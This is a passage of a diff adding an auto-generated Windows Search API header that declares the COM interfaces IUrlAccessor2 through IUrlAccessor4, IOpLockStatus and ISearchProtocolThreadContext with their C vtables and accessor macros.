+        HRESULT ( STDMETHODCALLTYPE *GetSecurityDescriptor )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][out] */ __RPC__out_ecount_full(dwSize) BYTE *pSD,
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetRedirectedURL )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszRedirectedURL[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityProvider )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [out] */ __RPC__out CLSID *pSPClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToStream )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [out] */ __RPC__deref_out_opt IStream **ppStream);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToFilter )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [out] */ __RPC__deref_out_opt IFilter **ppFilter);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDisplayUrl )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocUrl[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDocument )( 
+            __RPC__in IUrlAccessor2 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCodePage )( 
+            __RPC__in IUrlAccessor2 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszCodePage[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        END_INTERFACE
+    } IUrlAccessor2Vtbl;
+
+    interface IUrlAccessor2
+    {
+        CONST_VTBL struct IUrlAccessor2Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IUrlAccessor2_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IUrlAccessor2_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IUrlAccessor2_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IUrlAccessor2_AddRequestParameter(This,pSpec,pVar)	\
+    ( (This)->lpVtbl -> AddRequestParameter(This,pSpec,pVar) ) 
+
+#define IUrlAccessor2_GetDocFormat(This,wszDocFormat,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDocFormat(This,wszDocFormat,dwSize,pdwLength) ) 
+
+#define IUrlAccessor2_GetCLSID(This,pClsid)	\
+    ( (This)->lpVtbl -> GetCLSID(This,pClsid) ) 
+
+#define IUrlAccessor2_GetHost(This,wszHost,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetHost(This,wszHost,dwSize,pdwLength) ) 
+
+#define IUrlAccessor2_IsDirectory(This)	\
+    ( (This)->lpVtbl -> IsDirectory(This) ) 
+
+#define IUrlAccessor2_GetSize(This,pllSize)	\
+    ( (This)->lpVtbl -> GetSize(This,pllSize) ) 
+
+#define IUrlAccessor2_GetLastModified(This,pftLastModified)	\
+    ( (This)->lpVtbl -> GetLastModified(This,pftLastModified) ) 
+
+#define IUrlAccessor2_GetFileName(This,wszFileName,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetFileName(This,wszFileName,dwSize,pdwLength) ) 
+
+#define IUrlAccessor2_GetSecurityDescriptor(This,pSD,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetSecurityDescriptor(This,pSD,dwSize,pdwLength) ) 
+
+#define IUrlAccessor2_GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength) ) 
+
+#define IUrlAccessor2_GetSecurityProvider(This,pSPClsid)	\
+    ( (This)->lpVtbl -> GetSecurityProvider(This,pSPClsid) ) 
+
+#define IUrlAccessor2_BindToStream(This,ppStream)	\
+    ( (This)->lpVtbl -> BindToStream(This,ppStream) ) 
+
+#define IUrlAccessor2_BindToFilter(This,ppFilter)	\
+    ( (This)->lpVtbl -> BindToFilter(This,ppFilter) ) 
+
+
+#define IUrlAccessor2_GetDisplayUrl(This,wszDocUrl,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDisplayUrl(This,wszDocUrl,dwSize,pdwLength) ) 
+
+#define IUrlAccessor2_IsDocument(This)	\
+    ( (This)->lpVtbl -> IsDocument(This) ) 
+
+#define IUrlAccessor2_GetCodePage(This,wszCodePage,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetCodePage(This,wszCodePage,dwSize,pdwLength) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IUrlAccessor2_INTERFACE_DEFINED__ */
+
+
+#ifndef __IUrlAccessor3_INTERFACE_DEFINED__
+#define __IUrlAccessor3_INTERFACE_DEFINED__
+
+/* interface IUrlAccessor3 */
+/* [unique][public][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IUrlAccessor3;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("6FBC7005-0455-4874-B8FF-7439450241A3")
+    IUrlAccessor3 : public IUrlAccessor2
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE GetImpersonationSidBlobs( 
+            /* [in] */ __RPC__in LPCWSTR pcwszURL,
+            /* [out] */ __RPC__out DWORD *pcSidCount,
+            /* [out] */ __RPC__deref_out_opt BLOB **ppSidBlobs) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IUrlAccessor3Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IUrlAccessor3 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IUrlAccessor3 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddRequestParameter )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [in] */ __RPC__in PROPSPEC *pSpec,
+            /* [in] */ __RPC__in PROPVARIANT *pVar);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDocFormat )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocFormat[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCLSID )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [out] */ __RPC__out CLSID *pClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetHost )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszHost[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDirectory )( 
+            __RPC__in IUrlAccessor3 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSize )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [out] */ __RPC__out ULONGLONG *pllSize);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetLastModified )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [out] */ __RPC__out FILETIME *pftLastModified);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetFileName )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszFileName[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityDescriptor )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][out] */ __RPC__out_ecount_full(dwSize) BYTE *pSD,
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetRedirectedURL )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszRedirectedURL[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityProvider )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [out] */ __RPC__out CLSID *pSPClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToStream )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [out] */ __RPC__deref_out_opt IStream **ppStream);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToFilter )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [out] */ __RPC__deref_out_opt IFilter **ppFilter);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDisplayUrl )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocUrl[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDocument )( 
+            __RPC__in IUrlAccessor3 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCodePage )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszCodePage[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetImpersonationSidBlobs )( 
+            __RPC__in IUrlAccessor3 * This,
+            /* [in] */ __RPC__in LPCWSTR pcwszURL,
+            /* [out] */ __RPC__out DWORD *pcSidCount,
+            /* [out] */ __RPC__deref_out_opt BLOB **ppSidBlobs);
+        
+        END_INTERFACE
+    } IUrlAccessor3Vtbl;
+
+    interface IUrlAccessor3
+    {
+        CONST_VTBL struct IUrlAccessor3Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IUrlAccessor3_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IUrlAccessor3_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IUrlAccessor3_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IUrlAccessor3_AddRequestParameter(This,pSpec,pVar)	\
+    ( (This)->lpVtbl -> AddRequestParameter(This,pSpec,pVar) ) 
+
+#define IUrlAccessor3_GetDocFormat(This,wszDocFormat,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDocFormat(This,wszDocFormat,dwSize,pdwLength) ) 
+
+#define IUrlAccessor3_GetCLSID(This,pClsid)	\
+    ( (This)->lpVtbl -> GetCLSID(This,pClsid) ) 
+
+#define IUrlAccessor3_GetHost(This,wszHost,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetHost(This,wszHost,dwSize,pdwLength) ) 
+
+#define IUrlAccessor3_IsDirectory(This)	\
+    ( (This)->lpVtbl -> IsDirectory(This) ) 
+
+#define IUrlAccessor3_GetSize(This,pllSize)	\
+    ( (This)->lpVtbl -> GetSize(This,pllSize) ) 
+
+#define IUrlAccessor3_GetLastModified(This,pftLastModified)	\
+    ( (This)->lpVtbl -> GetLastModified(This,pftLastModified) ) 
+
+#define IUrlAccessor3_GetFileName(This,wszFileName,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetFileName(This,wszFileName,dwSize,pdwLength) ) 
+
+#define IUrlAccessor3_GetSecurityDescriptor(This,pSD,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetSecurityDescriptor(This,pSD,dwSize,pdwLength) ) 
+
+#define IUrlAccessor3_GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength) ) 
+
+#define IUrlAccessor3_GetSecurityProvider(This,pSPClsid)	\
+    ( (This)->lpVtbl -> GetSecurityProvider(This,pSPClsid) ) 
+
+#define IUrlAccessor3_BindToStream(This,ppStream)	\
+    ( (This)->lpVtbl -> BindToStream(This,ppStream) ) 
+
+#define IUrlAccessor3_BindToFilter(This,ppFilter)	\
+    ( (This)->lpVtbl -> BindToFilter(This,ppFilter) ) 
+
+
+#define IUrlAccessor3_GetDisplayUrl(This,wszDocUrl,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDisplayUrl(This,wszDocUrl,dwSize,pdwLength) ) 
+
+#define IUrlAccessor3_IsDocument(This)	\
+    ( (This)->lpVtbl -> IsDocument(This) ) 
+
+#define IUrlAccessor3_GetCodePage(This,wszCodePage,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetCodePage(This,wszCodePage,dwSize,pdwLength) ) 
+
+
+#define IUrlAccessor3_GetImpersonationSidBlobs(This,pcwszURL,pcSidCount,ppSidBlobs)	\
+    ( (This)->lpVtbl -> GetImpersonationSidBlobs(This,pcwszURL,pcSidCount,ppSidBlobs) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IUrlAccessor3_INTERFACE_DEFINED__ */
+
+
+#ifndef __IUrlAccessor4_INTERFACE_DEFINED__
+#define __IUrlAccessor4_INTERFACE_DEFINED__
+
+/* interface IUrlAccessor4 */
+/* [unique][public][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IUrlAccessor4;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("5CC51041-C8D2-41d7-BCA3-9E9E286297DC")
+    IUrlAccessor4 : public IUrlAccessor3
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE ShouldIndexItemContent( 
+            /* [out] */ __RPC__out BOOL *pfIndexContent) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ShouldIndexProperty( 
+            /* [in] */ __RPC__in REFPROPERTYKEY key,
+            /* [out] */ __RPC__out BOOL *pfIndexProperty) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IUrlAccessor4Vtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [in] */ __RPC__in REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            __RPC__in IUrlAccessor4 * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            __RPC__in IUrlAccessor4 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *AddRequestParameter )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [in] */ __RPC__in PROPSPEC *pSpec,
+            /* [in] */ __RPC__in PROPVARIANT *pVar);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDocFormat )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocFormat[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCLSID )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__out CLSID *pClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetHost )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszHost[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDirectory )( 
+            __RPC__in IUrlAccessor4 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSize )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__out ULONGLONG *pllSize);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetLastModified )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__out FILETIME *pftLastModified);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetFileName )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszFileName[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityDescriptor )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][out] */ __RPC__out_ecount_full(dwSize) BYTE *pSD,
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetRedirectedURL )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszRedirectedURL[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetSecurityProvider )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__out CLSID *pSPClsid);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToStream )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__deref_out_opt IStream **ppStream);
+        
+        HRESULT ( STDMETHODCALLTYPE *BindToFilter )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__deref_out_opt IFilter **ppFilter);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetDisplayUrl )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszDocUrl[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsDocument )( 
+            __RPC__in IUrlAccessor4 * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetCodePage )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [size_is][length_is][out] */ __RPC__out_ecount_part(dwSize, *pdwLength) WCHAR wszCodePage[  ],
+            /* [in] */ DWORD dwSize,
+            /* [out] */ __RPC__out DWORD *pdwLength);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetImpersonationSidBlobs )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [in] */ __RPC__in LPCWSTR pcwszURL,
+            /* [out] */ __RPC__out DWORD *pcSidCount,
+            /* [out] */ __RPC__deref_out_opt BLOB **ppSidBlobs);
+        
+        HRESULT ( STDMETHODCALLTYPE *ShouldIndexItemContent )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [out] */ __RPC__out BOOL *pfIndexContent);
+        
+        HRESULT ( STDMETHODCALLTYPE *ShouldIndexProperty )( 
+            __RPC__in IUrlAccessor4 * This,
+            /* [in] */ __RPC__in REFPROPERTYKEY key,
+            /* [out] */ __RPC__out BOOL *pfIndexProperty);
+        
+        END_INTERFACE
+    } IUrlAccessor4Vtbl;
+
+    interface IUrlAccessor4
+    {
+        CONST_VTBL struct IUrlAccessor4Vtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IUrlAccessor4_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IUrlAccessor4_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IUrlAccessor4_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IUrlAccessor4_AddRequestParameter(This,pSpec,pVar)	\
+    ( (This)->lpVtbl -> AddRequestParameter(This,pSpec,pVar) ) 
+
+#define IUrlAccessor4_GetDocFormat(This,wszDocFormat,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDocFormat(This,wszDocFormat,dwSize,pdwLength) ) 
+
+#define IUrlAccessor4_GetCLSID(This,pClsid)	\
+    ( (This)->lpVtbl -> GetCLSID(This,pClsid) ) 
+
+#define IUrlAccessor4_GetHost(This,wszHost,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetHost(This,wszHost,dwSize,pdwLength) ) 
+
+#define IUrlAccessor4_IsDirectory(This)	\
+    ( (This)->lpVtbl -> IsDirectory(This) ) 
+
+#define IUrlAccessor4_GetSize(This,pllSize)	\
+    ( (This)->lpVtbl -> GetSize(This,pllSize) ) 
+
+#define IUrlAccessor4_GetLastModified(This,pftLastModified)	\
+    ( (This)->lpVtbl -> GetLastModified(This,pftLastModified) ) 
+
+#define IUrlAccessor4_GetFileName(This,wszFileName,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetFileName(This,wszFileName,dwSize,pdwLength) ) 
+
+#define IUrlAccessor4_GetSecurityDescriptor(This,pSD,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetSecurityDescriptor(This,pSD,dwSize,pdwLength) ) 
+
+#define IUrlAccessor4_GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetRedirectedURL(This,wszRedirectedURL,dwSize,pdwLength) ) 
+
+#define IUrlAccessor4_GetSecurityProvider(This,pSPClsid)	\
+    ( (This)->lpVtbl -> GetSecurityProvider(This,pSPClsid) ) 
+
+#define IUrlAccessor4_BindToStream(This,ppStream)	\
+    ( (This)->lpVtbl -> BindToStream(This,ppStream) ) 
+
+#define IUrlAccessor4_BindToFilter(This,ppFilter)	\
+    ( (This)->lpVtbl -> BindToFilter(This,ppFilter) ) 
+
+
+#define IUrlAccessor4_GetDisplayUrl(This,wszDocUrl,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetDisplayUrl(This,wszDocUrl,dwSize,pdwLength) ) 
+
+#define IUrlAccessor4_IsDocument(This)	\
+    ( (This)->lpVtbl -> IsDocument(This) ) 
+
+#define IUrlAccessor4_GetCodePage(This,wszCodePage,dwSize,pdwLength)	\
+    ( (This)->lpVtbl -> GetCodePage(This,wszCodePage,dwSize,pdwLength) ) 
+
+
+#define IUrlAccessor4_GetImpersonationSidBlobs(This,pcwszURL,pcSidCount,ppSidBlobs)	\
+    ( (This)->lpVtbl -> GetImpersonationSidBlobs(This,pcwszURL,pcSidCount,ppSidBlobs) ) 
+
+
+#define IUrlAccessor4_ShouldIndexItemContent(This,pfIndexContent)	\
+    ( (This)->lpVtbl -> ShouldIndexItemContent(This,pfIndexContent) ) 
+
+#define IUrlAccessor4_ShouldIndexProperty(This,key,pfIndexProperty)	\
+    ( (This)->lpVtbl -> ShouldIndexProperty(This,key,pfIndexProperty) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IUrlAccessor4_INTERFACE_DEFINED__ */
+
+
+/* interface __MIDL_itf_searchapi_0000_0004 */
+/* [local] */ 
+
+#endif /* WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP) */
+#pragma endregion
+#include <winapifamily.h>
+#pragma region Desktop Family
+#if WINAPI_FAMILY_PARTITION(WINAPI_PARTITION_DESKTOP)
+
+
+
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0004_v0_0_c_ifspec;
+extern RPC_IF_HANDLE __MIDL_itf_searchapi_0000_0004_v0_0_s_ifspec;
+
+#ifndef __IOpLockStatus_INTERFACE_DEFINED__
+#define __IOpLockStatus_INTERFACE_DEFINED__
+
+/* interface IOpLockStatus */
+/* [unique][local][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_IOpLockStatus;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("c731065d-ac80-11d1-8df3-00c04fb6ef4f")
+    IOpLockStatus : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE IsOplockValid( 
+            /* [annotation][out] */ 
+            _Out_  BOOL *pfIsOplockValid) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE IsOplockBroken( 
+            /* [annotation][out] */ 
+            _Out_  BOOL *pfIsOplockBroken) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE GetOplockEventHandle( 
+            /* [annotation][out] */ 
+            _Outptr_  HANDLE *phOplockEv) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct IOpLockStatusVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            IOpLockStatus * This,
+            /* [in] */ REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            IOpLockStatus * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            IOpLockStatus * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsOplockValid )( 
+            IOpLockStatus * This,
+            /* [annotation][out] */ 
+            _Out_  BOOL *pfIsOplockValid);
+        
+        HRESULT ( STDMETHODCALLTYPE *IsOplockBroken )( 
+            IOpLockStatus * This,
+            /* [annotation][out] */ 
+            _Out_  BOOL *pfIsOplockBroken);
+        
+        HRESULT ( STDMETHODCALLTYPE *GetOplockEventHandle )( 
+            IOpLockStatus * This,
+            /* [annotation][out] */ 
+            _Outptr_  HANDLE *phOplockEv);
+        
+        END_INTERFACE
+    } IOpLockStatusVtbl;
+
+    interface IOpLockStatus
+    {
+        CONST_VTBL struct IOpLockStatusVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define IOpLockStatus_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define IOpLockStatus_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define IOpLockStatus_Release(This)	\
+    ( (This)->lpVtbl -> Release(This) ) 
+
+
+#define IOpLockStatus_IsOplockValid(This,pfIsOplockValid)	\
+    ( (This)->lpVtbl -> IsOplockValid(This,pfIsOplockValid) ) 
+
+#define IOpLockStatus_IsOplockBroken(This,pfIsOplockBroken)	\
+    ( (This)->lpVtbl -> IsOplockBroken(This,pfIsOplockBroken) ) 
+
+#define IOpLockStatus_GetOplockEventHandle(This,phOplockEv)	\
+    ( (This)->lpVtbl -> GetOplockEventHandle(This,phOplockEv) ) 
+
+#endif /* COBJMACROS */
+
+
+#endif 	/* C style interface */
+
+
+
+
+#endif 	/* __IOpLockStatus_INTERFACE_DEFINED__ */
+
+
+#ifndef __ISearchProtocolThreadContext_INTERFACE_DEFINED__
+#define __ISearchProtocolThreadContext_INTERFACE_DEFINED__
+
+/* interface ISearchProtocolThreadContext */
+/* [unique][local][helpstring][uuid][object] */ 
+
+
+EXTERN_C const IID IID_ISearchProtocolThreadContext;
+
+#if defined(__cplusplus) && !defined(CINTERFACE)
+    
+    MIDL_INTERFACE("c73106e1-ac80-11d1-8df3-00c04fb6ef4f")
+    ISearchProtocolThreadContext : public IUnknown
+    {
+    public:
+        virtual HRESULT STDMETHODCALLTYPE ThreadInit( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ThreadShutdown( void) = 0;
+        
+        virtual HRESULT STDMETHODCALLTYPE ThreadIdle( 
+            /* [in] */ DWORD dwTimeElaspedSinceLastCallInMS) = 0;
+        
+    };
+    
+    
+#else 	/* C style interface */
+
+    typedef struct ISearchProtocolThreadContextVtbl
+    {
+        BEGIN_INTERFACE
+        
+        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
+            ISearchProtocolThreadContext * This,
+            /* [in] */ REFIID riid,
+            /* [annotation][iid_is][out] */ 
+            _COM_Outptr_  void **ppvObject);
+        
+        ULONG ( STDMETHODCALLTYPE *AddRef )( 
+            ISearchProtocolThreadContext * This);
+        
+        ULONG ( STDMETHODCALLTYPE *Release )( 
+            ISearchProtocolThreadContext * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *ThreadInit )( 
+            ISearchProtocolThreadContext * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *ThreadShutdown )( 
+            ISearchProtocolThreadContext * This);
+        
+        HRESULT ( STDMETHODCALLTYPE *ThreadIdle )( 
+            ISearchProtocolThreadContext * This,
+            /* [in] */ DWORD dwTimeElaspedSinceLastCallInMS);
+        
+        END_INTERFACE
+    } ISearchProtocolThreadContextVtbl;
+
+    interface ISearchProtocolThreadContext
+    {
+        CONST_VTBL struct ISearchProtocolThreadContextVtbl *lpVtbl;
+    };
+
+    
+
+#ifdef COBJMACROS
+
+
+#define ISearchProtocolThreadContext_QueryInterface(This,riid,ppvObject)	\
+    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 
+
+#define ISearchProtocolThreadContext_AddRef(This)	\
+    ( (This)->lpVtbl -> AddRef(This) ) 
+
+#define ISearchProtocolThreadContext_Release(This)	\
